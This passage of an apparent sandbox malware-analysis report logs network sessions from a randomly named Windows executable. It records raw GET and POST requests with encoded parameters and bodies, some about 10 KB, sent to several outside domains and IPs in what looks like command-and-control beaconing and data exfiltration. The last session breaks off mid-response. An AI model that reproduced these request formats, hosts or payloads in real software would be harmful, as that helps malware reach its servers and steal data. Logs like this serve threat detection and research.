                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.449771162.241.253.174803760C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:29.265779018 CEST514OUTGET /nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY= HTTP/1.1
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Host: www.ndhockeyprospects.com
                  Connection: close
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                  Jul 4, 2024 03:13:30.462892056 CEST646INHTTP/1.1 301 Moved Permanently
                  Date: Thu, 04 Jul 2024 01:13:30 GMT
                  Server: nginx/1.21.6
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 0
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  X-Redirect-By: WordPress
                  Content-Security-Policy: upgrade-insecure-requests
                  Location: http://ndhockeyprospects.com/nce6/?5DGDh=Hn3dOR&b4=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY=
                  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                  X-Endurance-Cache-Level: 2
                  X-nginx-cache: WordPress
                  X-Server-Cache: true
                  X-Proxy-Cache: MISS


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.44977238.47.232.224802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:30.898164034 CEST493OUTGET /rmef/?n02X2xPX=UdI5Nug9LeCq3QKyZxAFTuhDHYNaCA3T0/tR5L8b4jWaA2fUCVH3fLw1ebDEBIsiTWaLxfrgjTz4bD/84RJrNmZZ6yqPN++//ptV/K/4BOxQ2TPEoKO+wL0=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1
                  Host: www.ytw6.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:13:31.825758934 CEST691INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:31 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.44977335.190.52.58802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:45.175297022 CEST753OUTPOST /2e2r/ HTTP/1.1
                  Host: www.hsck520.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.hsck520.com
                  Referer: http://www.hsck520.com/2e2r/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 35 63 47 6f 59 2b 54 36 44 56 79 77 34 30 78 45 6d 71 76 72 69 2b 37 39 4e 42 52 39 6b 79 74 42 39 58 38 63 77 6c 43 74 6a 45 57 61 43 42 64 7a 67 78 36 55 68 4f 68 68 39 38 6f 73 42 4b 49 56 59 66 6c 2b 6a 30 64 79 68 52 6d 50 54 33 67 63 4d 6d 6c 72 39 74 71 5a 45 74 54 72 73 69 4f 36 6d 57 75 75 45 78 49 41 4d 58 68 55 77 4e 57 46 33 38 67 72 39 4d 7a 49 41 46 68 64 47 78 48 43 43 73 57 41 64 34 66 74 32 72 62 61 66 67 64 6e 44 6e 52 78 6e 2f 66 75 70 56 2f 47 4d 5a 66 41 39 43 65 45 47 55 70 4c 4d 38 67 39 75 32 6c 57 78 39 32 45 78 52 74 35 37 35 77 59 4c 6f 67 6e 33 41 3d 3d
                  Data Ascii: n02X2xPX=5cGoY+T6DVyw40xEmqvri+79NBR9kytB9X8cwlCtjEWaCBdzgx6UhOhh98osBKIVYfl+j0dyhRmPT3gcMmlr9tqZEtTrsiO6mWuuExIAMXhUwNWF38gr9MzIAFhdGxHCCsWAd4ft2rbafgdnDnRxn/fupV/GMZfA9CeEGUpLM8g9u2lWx92ExRt575wYLogn3A==
                  Jul 4, 2024 03:13:45.841424942 CEST176INHTTP/1.1 405 Method Not Allowed
                  Server: nginx/1.20.2
                  Date: Thu, 04 Jul 2024 01:13:45 GMT
                  Content-Type: text/html
                  Content-Length: 559
                  Via: 1.1 google
                  Connection: close
                  Jul 4, 2024 03:13:45.844921112 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.449774202.95.21.152803760C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:46.020454884 CEST769OUTPOST /3in6/ HTTP/1.1
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Host: www.qmancha.com
                  Content-Length: 199
                  Connection: close
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Origin: http://www.qmancha.com
                  Referer: http://www.qmancha.com/3in6/
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                  Data Raw: 62 34 3d 4d 63 41 59 47 4a 45 59 6a 78 5a 6d 59 31 6a 67 59 6b 76 78 69 55 45 6e 38 6e 42 55 2f 65 6b 58 54 50 2f 51 56 63 65 47 77 65 4d 47 57 74 70 63 45 6c 67 56 72 6c 51 59 4b 47 71 6d 32 6c 49 44 39 4c 4d 4a 61 64 67 70 6f 44 77 53 7a 63 78 43 66 4d 76 4e 51 59 55 4d 6d 72 72 69 33 51 61 4e 39 67 79 37 6d 35 62 78 49 41 62 70 41 46 64 58 2f 5a 5a 70 6c 61 52 30 42 7a 6c 77 38 52 4e 4f 32 77 6e 78 36 4f 36 7a 59 70 50 57 72 65 4a 51 39 49 49 50 64 70 57 6e 79 2f 45 67 64 54 71 31 32 79 30 48 4a 6f 71 56 67 77 35 69 58 63 6c 65 55 74 64 6f 4b 2b 6e 35 49 48 77 2f 32 45 34 35 50 77 3d 3d
                  Data Ascii: b4=McAYGJEYjxZmY1jgYkvxiUEn8nBU/ekXTP/QVceGweMGWtpcElgVrlQYKGqm2lID9LMJadgpoDwSzcxCfMvNQYUMmrri3QaN9gy7m5bxIAbpAFdX/ZZplaR0Bzlw8RNO2wnx6O6zYpPWreJQ9IIPdpWny/EgdTq12y0HJoqVgw5iXcleUtdoK+n5IHw/2E45Pw==
                  Jul 4, 2024 03:13:46.965007067 CEST190INHTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:46 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: d404 Not Found0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.44977535.190.52.58802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:47.726028919 CEST773OUTPOST /2e2r/ HTTP/1.1
                  Host: www.hsck520.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.hsck520.com
                  Referer: http://www.hsck520.com/2e2r/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 35 63 47 6f 59 2b 54 36 44 56 79 77 34 55 68 45 6b 4a 33 72 71 2b 37 2b 42 68 52 39 74 53 73 49 39 58 77 63 77 6b 32 39 67 33 79 61 43 68 74 7a 68 77 36 55 79 2b 68 68 70 73 6f 74 4f 71 49 61 59 66 6f 44 6a 77 5a 79 68 56 47 50 54 33 77 63 4d 52 4a 71 39 39 71 62 52 39 54 6c 6f 69 4f 36 6d 57 75 75 45 78 63 71 4d 58 35 55 77 39 47 46 32 64 67 6f 77 73 7a 4a 51 56 68 64 58 68 48 47 43 73 57 6d 64 35 7a 48 32 6f 6a 61 66 6c 5a 6e 44 32 52 32 79 50 66 6f 6d 31 2b 65 63 59 71 76 7a 53 6a 6c 4c 6b 68 36 46 65 38 6b 76 77 30 4d 67 4d 58 54 6a 52 4a 4b 6d 2b 35 73 47 72 64 75 73 45 44 73 4b 2f 54 69 76 45 56 4a 51 4e 44 32 74 4c 36 6b 49 51 34 3d
                  Data Ascii: n02X2xPX=5cGoY+T6DVyw4UhEkJ3rq+7+BhR9tSsI9Xwcwk29g3yaChtzhw6Uy+hhpsotOqIaYfoDjwZyhVGPT3wcMRJq99qbR9TloiO6mWuuExcqMX5Uw9GF2dgowszJQVhdXhHGCsWmd5zH2ojaflZnD2R2yPfom1+ecYqvzSjlLkh6Fe8kvw0MgMXTjRJKm+5sGrdusEDsK/TivEVJQND2tL6kIQ4=
                  Jul 4, 2024 03:13:48.393785954 CEST176INHTTP/1.1 405 Method Not Allowed
                  Server: nginx/1.20.2
                  Date: Thu, 04 Jul 2024 01:13:48 GMT
                  Content-Type: text/html
                  Content-Length: 559
                  Via: 1.1 google
                  Connection: close
                  Jul 4, 2024 03:13:48.397483110 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.449776202.95.21.152803760C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:48.555866003 CEST789OUTPOST /3in6/ HTTP/1.1
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Host: www.qmancha.com
                  Content-Length: 219
                  Connection: close
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Origin: http://www.qmancha.com
                  Referer: http://www.qmancha.com/3in6/
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                  Data Raw: 62 34 3d 4d 63 41 59 47 4a 45 59 6a 78 5a 6d 58 31 54 67 5a 48 33 78 71 55 45 6b 7a 48 42 55 31 2b 6b 4c 54 50 44 51 56 5a 6d 57 77 74 6f 47 54 39 5a 63 48 68 30 56 71 6c 51 59 43 6d 71 70 38 46 49 32 39 4c 49 33 61 63 63 70 6f 43 51 53 7a 64 42 43 66 2f 48 4d 52 49 55 4f 75 4c 71 6b 6f 41 61 4e 39 67 79 37 6d 34 2f 62 49 41 44 70 41 31 74 58 39 39 4e 75 6d 61 52 31 47 7a 6c 77 32 78 4d 6d 32 77 6e 70 36 4c 6a 59 59 72 48 57 72 66 35 51 2b 64 6b 4d 45 5a 57 74 2f 66 46 2b 63 52 4c 43 73 58 49 4c 4b 6f 32 46 6a 7a 56 62 57 61 30 45 46 63 38 2f 59 2b 44 4b 56 41 35 4c 37 48 46 77 55 34 51 75 41 52 2f 31 39 30 72 4f 76 79 34 59 54 42 7a 34 75 57 34 3d
                  Data Ascii: b4=McAYGJEYjxZmX1TgZH3xqUEkzHBU1+kLTPDQVZmWwtoGT9ZcHh0VqlQYCmqp8FI29LI3accpoCQSzdBCf/HMRIUOuLqkoAaN9gy7m4/bIADpA1tX99NumaR1Gzlw2xMm2wnp6LjYYrHWrf5Q+dkMEZWt/fF+cRLCsXILKo2FjzVbWa0EFc8/Y+DKVA5L7HFwU4QuAR/190rOvy4YTBz4uW4=
                  Jul 4, 2024 03:13:49.515157938 CEST190INHTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:49 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: d404 Not Found0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.44977735.190.52.58802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:50.257460117 CEST10855OUTPOST /2e2r/ HTTP/1.1
                  Host: www.hsck520.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.hsck520.com
                  Referer: http://www.hsck520.com/2e2r/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 35 63 47 6f 59 2b 54 36 44 56 79 77 34 55 68 45 6b 4a 33 72 71 2b 37 2b 42 68 52 39 74 53 73 49 39 58 77 63 77 6b 32 39 67 33 36 61 44 54 6c 7a 67 54 69 55 6a 4f 68 68 32 63 6f 6f 4f 71 49 39 59 66 77 50 6a 31 42 45 68 54 4b 50 53 55 6f 63 64 46 64 71 79 39 71 62 4f 4e 54 6b 73 69 4f 56 6d 57 2b 71 45 78 4d 71 4d 58 35 55 77 2f 4f 46 78 4d 67 6f 79 73 7a 49 41 46 68 52 47 78 47 68 43 6f 37 64 64 35 48 39 32 35 44 61 66 46 70 6e 42 45 35 32 75 66 66 71 79 56 2b 4e 63 59 32 77 7a 52 58 50 4c 6c 6c 63 46 63 67 6b 75 56 70 32 39 59 65 56 30 67 42 76 37 66 51 4d 4f 70 64 51 74 54 54 57 43 2f 44 34 74 56 6b 37 65 74 4b 6f 6f 70 76 68 52 6d 56 38 5a 48 50 75 4e 76 45 33 4f 67 4f 2b 48 4d 64 75 74 79 61 53 36 59 2f 56 58 76 45 78 59 59 4b 7a 56 72 74 50 41 46 4e 75 54 7a 4a 32 49 76 33 69 70 54 6e 77 56 33 6c 73 38 75 48 7a 54 39 70 6d 38 66 71 46 53 52 6c 61 52 44 74 70 72 35 6f 5a 55 79 30 44 41 42 4a 44 7a 37 76 49 78 46 68 44 31 4d 31 4e 39 32 43 42 63 77 30 52 50 67 59 73 58 [TRUNCATED]
                  Data Ascii: n02X2xPX=5cGoY+T6DVyw4UhEkJ3rq+7+BhR9tSsI9Xwcwk29g36aDTlzgTiUjOhh2cooOqI9YfwPj1BEhTKPSUocdFdqy9qbONTksiOVmW+qExMqMX5Uw/OFxMgoyszIAFhRGxGhCo7dd5H925DafFpnBE52uffqyV+NcY2wzRXPLllcFcgkuVp29YeV0gBv7fQMOpdQtTTWC/D4tVk7etKoopvhRmV8ZHPuNvE3OgO+HMdutyaS6Y/VXvExYYKzVrtPAFNuTzJ2Iv3ipTnwV3ls8uHzT9pm8fqFSRlaRDtpr5oZUy0DABJDz7vIxFhD1M1N92CBcw0RPgYsXG+fVvbPgI3XWBqPLHaz63GNIc3vQGL0C3wLtFLgsJQwr4tIOpvCCKRXFm0ncHOW9yysvhZpttTp1cNJ8Mh3t84xVbyNbKpgaXxWV3rkF7SN0naI0ZogKIgOr2Lk/OK9GK9EWlm8PPRMS/4VJ76LM9njzUSlTftsFrCUicItry9htQ9uLuwj6ZyVFaLVTyPPnJsaIKKjtXn3uh+jJ0eCplpbrXUC49Q/gg4Y4RVd3JvIesbRGivdpYXig8UjOk2DECdzHFoNyBFtpkBT7Z/G2Sgg1KlK69lVve2QFFkHV7j8wDSgZCgebVwpklf8Q5eIQnS/Qev6NogkK2tTBx2FtoR3zk7OuQmFHvoZl6C/3i1WDYp7V4HVSFjGMGLY5fFf5MYwxwg/MeoMjeQ7lSEVZb7+8+sFY2f9wEJhUBZOWXaylZWP9kIjAuOprhOKA4R2dKnDU8QVLrbccY7pUZtrMygKxeap7xhO6HX7bL9l8S4c8+XiO/k6mADe7aeIA5MZ66kzuzCNOeHh1d7HkKI3f/KbfZK8D2g4GqrJegXKwIa75jSqML+VW3fNPDaWt0OZJr1eXou1dhs7yR/HsH8cqFCI/+e6PzgULmr02RQJMKdTdfozmSOuCs4TJWFd9kzeu/JP4uaKI6AWmupx/hKQc8DS7XR8LrL6ucv [TRUNCATED]
                  Jul 4, 2024 03:13:50.931133986 CEST176INHTTP/1.1 405 Method Not Allowed
                  Server: nginx/1.20.2
                  Date: Thu, 04 Jul 2024 01:13:50 GMT
                  Content-Type: text/html
                  Content-Length: 559
                  Via: 1.1 google
                  Connection: close
                  Jul 4, 2024 03:13:50.934201002 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.449778202.95.21.152803760C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:51.085139990 CEST10871OUTPOST /3in6/ HTTP/1.1
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Host: www.qmancha.com
                  Content-Length: 10299
                  Connection: close
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Origin: http://www.qmancha.com
                  Referer: http://www.qmancha.com/3in6/
                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                  Data Raw: 62 34 3d 4d 63 41 59 47 4a 45 59 6a 78 5a 6d 58 31 54 67 5a 48 33 78 71 55 45 6b 7a 48 42 55 31 2b 6b 4c 54 50 44 51 56 5a 6d 57 77 74 67 47 54 76 52 63 48 47 59 56 74 6c 51 59 49 47 71 71 38 46 49 52 39 4c 77 7a 61 63 51 54 6f 48 55 53 79 2b 4a 43 5a 4f 48 4d 59 49 55 4f 69 72 71 30 33 51 61 69 39 67 69 33 6d 35 50 62 49 41 44 70 41 32 6c 58 35 70 5a 75 67 61 52 30 42 7a 6c 73 38 52 4e 4c 32 77 2f 58 36 4c 58 75 59 61 6e 57 72 2f 70 51 38 76 63 4d 62 70 57 6a 73 76 46 32 63 52 48 64 73 58 39 34 4b 72 71 76 6a 77 4a 62 58 72 78 34 56 4f 38 34 4e 38 4c 45 43 41 42 54 7a 33 74 69 4e 5a 73 4d 51 78 66 71 68 46 37 64 75 41 30 55 48 30 76 35 32 78 61 6c 49 48 59 34 45 64 56 64 45 63 50 56 55 41 59 35 58 37 6e 71 61 48 54 76 64 4a 6c 72 36 55 70 57 35 2b 44 70 41 69 52 37 77 46 39 66 53 52 59 47 35 6a 57 74 65 47 4b 7a 4e 6b 73 37 55 51 53 71 75 75 4e 47 71 71 6a 67 59 64 6e 74 33 6a 41 2f 52 57 45 41 38 41 32 62 7a 6c 2b 31 6c 6d 59 6e 74 6c 74 6b 55 54 77 69 41 42 59 38 6b 4d 74 72 4d 68 4e 71 32 71 4f [TRUNCATED]
                  Data Ascii: b4=McAYGJEYjxZmX1TgZH3xqUEkzHBU1+kLTPDQVZmWwtgGTvRcHGYVtlQYIGqq8FIR9LwzacQToHUSy+JCZOHMYIUOirq03Qai9gi3m5PbIADpA2lX5pZugaR0Bzls8RNL2w/X6LXuYanWr/pQ8vcMbpWjsvF2cRHdsX94KrqvjwJbXrx4VO84N8LECABTz3tiNZsMQxfqhF7duA0UH0v52xalIHY4EdVdEcPVUAY5X7nqaHTvdJlr6UpW5+DpAiR7wF9fSRYG5jWteGKzNks7UQSquuNGqqjgYdnt3jA/RWEA8A2bzl+1lmYntltkUTwiABY8kMtrMhNq2qOqHT7N+R6E1Yr8zyykgO6sc1u8C6HEhmepAGzI53GWS0lAurCTpP7ta6fpju11vFEWe33Uihpg0dPFHUt23GtEZ9xycIPFgbocVbhG4rU+VDf1h5FJqkkIhOybX6aZTwy6tp6IdUr5HjVPbDR2ox+ZFElVHJcIm8am4fpJjpvVft1vY6l7RPLoZUjpCXn6Ohh9R3mSIuNmF3sDLYrF5a8zi0CkDkiDpWHvlSAbc2k9yleB9mDw0HFwgzj+rN2JpyBXf/EYa2W7ztvTbFRo4SE7ejpSD+7RutRtjtm8W28RuerrZUiRaojjKoCv+j0+8mff02UcbK2uKNoYwxrYPBJVc/EjHpU88PUnSBBB9RbzsXWNtD9LJliNmowln8gUrbi6sCP2m/6RF0Mns9RCibO1k0Jf/bTTGIluBgV0V+4zgX1baj0xkUpcZzmuzGX2a3GmFCs2IqbqtyBel3prGguApn6gn2rnrTFsZFlUAFNw0fe5LYLJ5kryjptBcwOg28jc2FTPnQNT7+E3sQs2WK/o6dNB1SgV//D1XtAnfwd43nFsXJ7dypItL547F+QGwrkNhbY7NR88hrTTpN3pJ/+wPVBeZeQS8lVvA5K/jkCQ6r0B8pxR8+5YBh8drg8WlBycSvi7/5pKKCIzFXQrZkBcF+IKLgLTO1FUx [TRUNCATED]
                  Jul 4, 2024 03:13:52.042428970 CEST190INHTTP/1.1 400 Bad Request
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:51 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: d404 Not Found0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.44977935.190.52.58802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:52.790652990 CEST496OUTGET /2e2r/?n02X2xPX=0euIbLTFP3+EyEtzvor9i8vHBXpYgQpCpm4T5C+2kVz8Gw9LnD+VjddQp9QTALZxA8pe/VRvpSGAU2oGCWkdjrfpA+HWsjyp03alRT8mG3hS2I+8+ag3/fo=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1
                  Host: www.hsck520.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:13:53.623119116 CEST300INHTTP/1.1 200 OK
                  Server: nginx/1.20.2
                  Date: Thu, 04 Jul 2024 01:13:53 GMT
                  Content-Type: text/html
